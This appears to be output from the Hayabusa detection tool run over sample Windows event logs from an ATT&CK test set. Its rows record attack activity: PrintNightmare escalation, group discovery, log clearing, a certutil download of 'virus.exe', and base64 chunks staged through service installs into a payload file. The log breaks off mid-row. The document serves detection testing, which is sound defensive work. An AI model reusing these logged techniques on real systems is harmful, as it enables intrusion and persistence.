0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-31 23:28:15.330 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via 
PowerShell.evtx.evtx +2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.351 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.353 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.354 
+09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:37:10.246 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 23:37:10.247 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 23:37:10.396 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 23:37:10.398 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local 
Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 23:37:10.401 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 23:37:10.402 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f 
https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand 
